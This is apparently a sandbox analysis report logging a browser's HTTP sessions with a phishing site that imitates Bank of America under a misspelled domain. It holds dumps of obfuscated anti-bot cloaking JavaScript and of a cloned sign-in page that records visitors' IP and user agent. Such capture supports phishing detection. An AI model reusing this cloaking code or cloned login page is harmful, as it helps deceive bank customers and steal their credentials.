                                                                                              Data Ascii: g1Ky1wYXJzZUludChfMHgxNmU0ZDcoMHhiNikpLzB4NiooLXBhcnNlSW50KF8weDE2ZTRkNygweDk3KSkvMHg3KStwYXJzZUludChfMHgxNmU0ZDcoMHgxNDEpKS8weDgrcGFyc2VJbnQoXzB4MTZlNGQ3KDB4MTAwKSkvMHg5KigtcGFyc2VJbnQoXzB4MTZlNGQ3KDB4Y2IpKS8weGEpO2lmKF8weDNmMWJhZD09PV8weDNkODcyYSlicmVha
                                                                                              2025-01-15 18:41:52 UTC16384INData Raw: 31 68 63 6d 56 4b 55 79 63 73 4a 33 52 6f 5a 57 34 6e 4c 43 64 70 62 6d 52 6c 65 45 39 6d 4a 79 77 6e 59 6e 4a 76 64 33 4e 6c 63 6b 56 75 5a 32 6c 75 5a 55 74 70 62 6d 51 6e 4c 43 64 51 61 47 46 75 64 47 39 74 53 6c 4d 6e 4c 43 64 6a 62 32 46 6a 61 47 70 7a 4a 79 77 6e 62 57 6c 74 5a 56 52 35 63 47 56 7a 51 32 39 75 63 32 6c 7a 64 47 56 75 64 43 63 73 4a 32 52 6c 64 47 56 6a 64 43 63 73 4a 33 52 76 55 33 52 79 61 57 35 6e 4a 79 77 6e 64 32 56 6a 61 47 46 30 4a 79 77 6e 62 47 56 75 5a 33 52 6f 4a 79 77 6e 58 31 39 33 5a 57 4a 6b 63 6d 6c 32 5a 58 4a 47 64 57 35 6a 4a 79 77 6e 63 6e 52 30 4a 79 77 6e 61 47 56 68 5a 47 78 6c 63 33 4e 66 59 32 68 79 62 32 31 6c 4a 79 77 6e 64 32 6c 75 5a 47 39 33 4c 6b 35 76 64 47 6c 6d 61 57 4e 68 64 47 6c 76 62 6c 78 34 4d
                                                                                              Data Ascii: 1hcmVKUycsJ3RoZW4nLCdpbmRleE9mJywnYnJvd3NlckVuZ2luZUtpbmQnLCdQaGFudG9tSlMnLCdjb2FjaGpzJywnbWltZVR5cGVzQ29uc2lzdGVudCcsJ2RldGVjdCcsJ3RvU3RyaW5nJywnd2VjaGF0JywnbGVuZ3RoJywnX193ZWJkcml2ZXJGdW5jJywncnR0JywnaGVhZGxlc3NfY2hyb21lJywnd2luZG93Lk5vdGlmaWNhdGlvblx4M
                                                                                              2025-01-15 18:41:52 UTC11238INData Raw: 42 34 4d 54 56 69 4b 56 30 70 50 6a 30 77 65 44 4e 38 66 46 38 77 65 44 4d 30 4d 54 41 31 4d 56 74 66 4d 48 68 6b 59 6a 46 6d 4e 32 55 6f 4d 48 67 78 4d 7a 41 70 58 53 68 66 4d 48 67 78 5a 54 63 78 4e 57 46 62 58 7a 42 34 5a 47 49 78 5a 6a 64 6c 4b 44 42 34 4f 57 4d 70 58 53 6b 37 5a 57 78 7a 5a 58 74 70 5a 69 68 66 4d 48 68 6b 59 6a 46 6d 4e 32 55 6f 4d 48 67 78 4d 54 49 70 50 54 31 30 65 58 42 6c 62 32 59 67 58 7a 42 34 4d 57 55 33 4d 54 56 68 57 31 38 77 65 47 52 69 4d 57 59 33 5a 53 67 77 65 44 6c 6a 4b 56 30 70 65 33 5a 68 63 69 42 66 4d 48 67 31 4e 47 45 77 4d 54 67 39 58 7a 42 34 4d 57 55 33 4d 54 56 68 57 79 64 73 59 57 35 6e 64 57 46 6e 5a 58 4d 6e 58 54 74 66 4d 48 67 31 4e 47 45 77 4d 54 67 6d 4a 6c 38 77 65 44 4d 30 4d 54 41 31 4d 56 74 66 4d
                                                                                              Data Ascii: B4MTViKV0pPj0weDN8fF8weDM0MTA1MVtfMHhkYjFmN2UoMHgxMzApXShfMHgxZTcxNWFbXzB4ZGIxZjdlKDB4OWMpXSk7ZWxzZXtpZihfMHhkYjFmN2UoMHgxMTIpPT10eXBlb2YgXzB4MWU3MTVhW18weGRiMWY3ZSgweDljKV0pe3ZhciBfMHg1NGEwMTg9XzB4MWU3MTVhWydsYW5ndWFnZXMnXTtfMHg1NGEwMTgmJl8weDM0MTA1MVtfM


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.1659069188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:41:53 UTC769OUTGET /favicon.ico HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: image
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/secure/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D
                                                                                              2025-01-15 18:41:53 UTC553INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:41:53 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Set-Cookie: ppath=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: stp=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Set-Cookie: ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Length: 4178
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              2025-01-15 18:41:53 UTC4178INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 3e 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 7c 20 50 61 74 68 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 73 74 79 6c 65 3e 0d 0a
                                                                                              Data Ascii: <!DOCTYPE html><html lang="en-us"><head><meta charset="utf-8"><meta http-equiv="x-ua-compatible" content="ie=edge"><title>Service Unavailable | Path</title><meta name="viewport" content="width=device-width, initial-scale=1"><style>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.1659070188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:41:53 UTC821OUTPOST /secure/secure.php HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              Content-Length: 76
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Content-Type: application/json
                                                                                              Accept: */*
                                                                                              Origin: https://online.access.secure.bankofamerlica.com
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/secure/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D
                                                                                              2025-01-15 18:41:53 UTC76OUTData Raw: 7b 22 72 69 22 3a 22 35 61 34 64 32 32 65 32 62 32 62 62 64 38 65 65 65 63 64 31 65 35 62 36 62 30 31 32 64 39 38 37 22 2c 22 69 62 22 3a 22 30 22 2c 22 72 65 22 3a 22 22 2c 22 72 66 22 3a 22 39 38 35 34 74 6a 77 65 34 36 22 7d
                                                                                              Data Ascii: {"ri":"5a4d22e2b2bbd8eeecd1e5b6b012d987","ib":"0","re":"","rf":"9854tjwe46"}
                                                                                              2025-01-15 18:41:54 UTC276INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:41:53 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Content-Length: 0
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.1659071188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:41:54 UTC502OUTGET /favicon.ico HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D
                                                                                              2025-01-15 18:41:54 UTC566INHTTP/1.1 302 Found
                                                                                              Date: Wed, 15 Jan 2025 18:41:54 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Set-Cookie: stp=0; expires=Wed, 15-Jan-2025 19:41:54 GMT; Max-Age=3600; path=/
                                                                                              Set-Cookie: ppath=login%2Fsign-in%2FsignOnV2Screen.go; expires=Wed, 15-Jan-2025 19:41:54 GMT; Max-Age=3600; path=/
                                                                                              Location: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go
                                                                                              Content-Length: 0
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.1659075188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:41:55 UTC863OUTGET / HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Upgrade-Insecure-Requests: 1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: navigate
                                                                                              Sec-Fetch-Dest: document
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/secure/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D
                                                                                              2025-01-15 18:41:55 UTC566INHTTP/1.1 302 Found
                                                                                              Date: Wed, 15 Jan 2025 18:41:55 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Set-Cookie: stp=0; expires=Wed, 15-Jan-2025 19:41:55 GMT; Max-Age=3600; path=/
                                                                                              Set-Cookie: ppath=login%2Fsign-in%2FsignOnV2Screen.go; expires=Wed, 15-Jan-2025 19:41:55 GMT; Max-Age=3600; path=/
                                                                                              Location: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go
                                                                                              Content-Length: 0
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.1659073188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:41:55 UTC508OUTGET /secure/secure.php HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D
                                                                                              2025-01-15 18:41:55 UTC276INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:41:55 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Content-Length: 0
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              7192.168.2.1659076188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:41:55 UTC572OUTGET /login/sign-in/signOnV2Screen.go HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:41:55 UTC308INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:41:55 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Vary: Accept-Encoding
                                                                                              Connection: close
                                                                                              Transfer-Encoding: chunked
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              2025-01-15 18:41:55 UTC6INData Raw: 38 65 61 33 0d 0a
                                                                                              Data Ascii: 8ea3
                                                                                              2025-01-15 18:41:55 UTC7022INData Raw: ef bb bf 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 77 69 6e 20 66 66 20 66 66 2d 31 31 33 20 73 76 67 2d 62 67 20 6e 6f 74 2d 72 65 74 69 6e 61 20 63 66 2d 63 6e 78 2d 72 65 67 75 6c 61 72 2d 61 63 74 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 0d 0a 3c 68
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" class="win ff ff-113 svg-bg not-retina cf-cnx-regular-active" lang="en-US"><h
                                                                                              2025-01-15 18:41:56 UTC16384INData Raw: 35 61 34 64 32 32 65 32 62 32 62 62 64 38 65 65 65 63 64 31 65 35 62 36 62 30 31 32 64 39 38 37 22 20 2f 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 3c 69 6e 70 75 74 20 69 64 3d 22 69 70 22 20 6e 61 6d 65 3d 22 69 70 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 20 2f 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 3c 69 6e 70 75 74 20 69 64 3d 22 75 61 67 65 6e 74 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 75 61 67 65 6e 74 22 20 76 61 6c 75 65 3d 22 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f
                                                                                              Data Ascii: 5a4d22e2b2bbd8eeecd1e5b6b012d987" /><input id="ip" name="ip" type="hidden" value="8.46.123.189" /><input id="uagent" type="hidden" name="uagent" value="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko
                                                                                              2025-01-15 18:41:56 UTC13109INData Raw: 76 20 69 64 3d 22 72 65 73 74 65 73 74 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 30 2e 35 63 6d 3b 20 68 65 69 67 68 74 3a 20 30 2e 35 63 6d 3b 20 70 61 64 64 69 6e 67 3a 20 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6f 6e 65 74 72 75 73 74 2d 63 6f 6e 73 65 6e 74 2d 73 64 6b 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 6e 65 74 72 75 73 74 2d 70 63 2d 64 61 72 6b 2d 66 69 6c 74 65 72 20 6f 74 2d 68 69 64 65 20 6f 74 2d 66 61 64 65 2d 69 6e 22 3e 3c 2f 64 69 76 3e 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 6f 6e 65 74 72 75 73 74 2d 70 63 2d 73 64 6b 22 20 63 6c 61 73 73 3d 22 6f 74 50 63 54 61 62 20 6f 74 2d 68 69 64 65 20 6f 74 2d 66 61 64 65 2d 69 6e 20 6f 74 2d 73 64 6b 2d 6e 6f 74 2d 77 65 62 6b 69 74 20 6f 74
                                                                                              Data Ascii: v id="restest" style="width: 0.5cm; height: 0.5cm; padding: 0px"></div><div id="onetrust-consent-sdk"><div class="onetrust-pc-dark-filter ot-hide ot-fade-in"></div><div id="onetrust-pc-sdk" class="otPcTab ot-hide ot-fade-in ot-sdk-not-webkit ot
                                                                                              2025-01-15 18:41:56 UTC2INData Raw: 0d 0a
                                                                                              Data Ascii:
                                                                                              2025-01-15 18:41:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              8192.168.2.1659074188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:41:55 UTC944OUTGET /login/sign-in/signOnV2Screen.go HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              Upgrade-Insecure-Requests: 1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: navigate
                                                                                              Sec-Fetch-Dest: document
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/secure/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:41:55 UTC308INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:41:55 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Vary: Accept-Encoding
                                                                                              Connection: close
                                                                                              Transfer-Encoding: chunked
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              2025-01-15 18:41:55 UTC6INData Raw: 38 65 61 33 0d 0a
                                                                                              Data Ascii: 8ea3
                                                                                              2025-01-15 18:41:55 UTC7022INData Raw: ef bb bf 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 77 69 6e 20 66 66 20 66 66 2d 31 31 33 20 73 76 67 2d 62 67 20 6e 6f 74 2d 72 65 74 69 6e 61 20 63 66 2d 63 6e 78 2d 72 65 67 75 6c 61 72 2d 61 63 74 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 0d 0a 3c 68
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" class="win ff ff-113 svg-bg not-retina cf-cnx-regular-active" lang="en-US"><h
                                                                                              2025-01-15 18:41:56 UTC16384INData Raw: 35 61 34 64 32 32 65 32 62 32 62 62 64 38 65 65 65 63 64 31 65 35 62 36 62 30 31 32 64 39 38 37 22 20 2f 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 3c 69 6e 70 75 74 20 69 64 3d 22 69 70 22 20 6e 61 6d 65 3d 22 69 70 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 20 2f 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 3c 69 6e 70 75 74 20 69 64 3d 22 75 61 67 65 6e 74 22 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 75 61 67 65 6e 74 22 20 76 61 6c 75 65 3d 22 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f
                                                                                              Data Ascii: 5a4d22e2b2bbd8eeecd1e5b6b012d987" /><input id="ip" name="ip" type="hidden" value="8.46.123.189" /><input id="uagent" type="hidden" name="uagent" value="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko
                                                                                              2025-01-15 18:41:56 UTC13109INData Raw: 76 20 69 64 3d 22 72 65 73 74 65 73 74 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 30 2e 35 63 6d 3b 20 68 65 69 67 68 74 3a 20 30 2e 35 63 6d 3b 20 70 61 64 64 69 6e 67 3a 20 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6f 6e 65 74 72 75 73 74 2d 63 6f 6e 73 65 6e 74 2d 73 64 6b 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 6e 65 74 72 75 73 74 2d 70 63 2d 64 61 72 6b 2d 66 69 6c 74 65 72 20 6f 74 2d 68 69 64 65 20 6f 74 2d 66 61 64 65 2d 69 6e 22 3e 3c 2f 64 69 76 3e 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 6f 6e 65 74 72 75 73 74 2d 70 63 2d 73 64 6b 22 20 63 6c 61 73 73 3d 22 6f 74 50 63 54 61 62 20 6f 74 2d 68 69 64 65 20 6f 74 2d 66 61 64 65 2d 69 6e 20 6f 74 2d 73 64 6b 2d 6e 6f 74 2d 77 65 62 6b 69 74 20 6f 74
                                                                                              Data Ascii: v id="restest" style="width: 0.5cm; height: 0.5cm; padding: 0px"></div><div id="onetrust-consent-sdk"><div class="onetrust-pc-dark-filter ot-hide ot-fade-in"></div><div id="onetrust-pc-sdk" class="otPcTab ot-hide ot-fade-in ot-sdk-not-webkit ot
                                                                                              2025-01-15 18:41:56 UTC2INData Raw: 0d 0a
                                                                                              Data Ascii:
                                                                                              2025-01-15 18:41:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              9192.168.2.1659080188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:41:56 UTC810OUTGET /assets/vipaa-v4-jawr.css HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
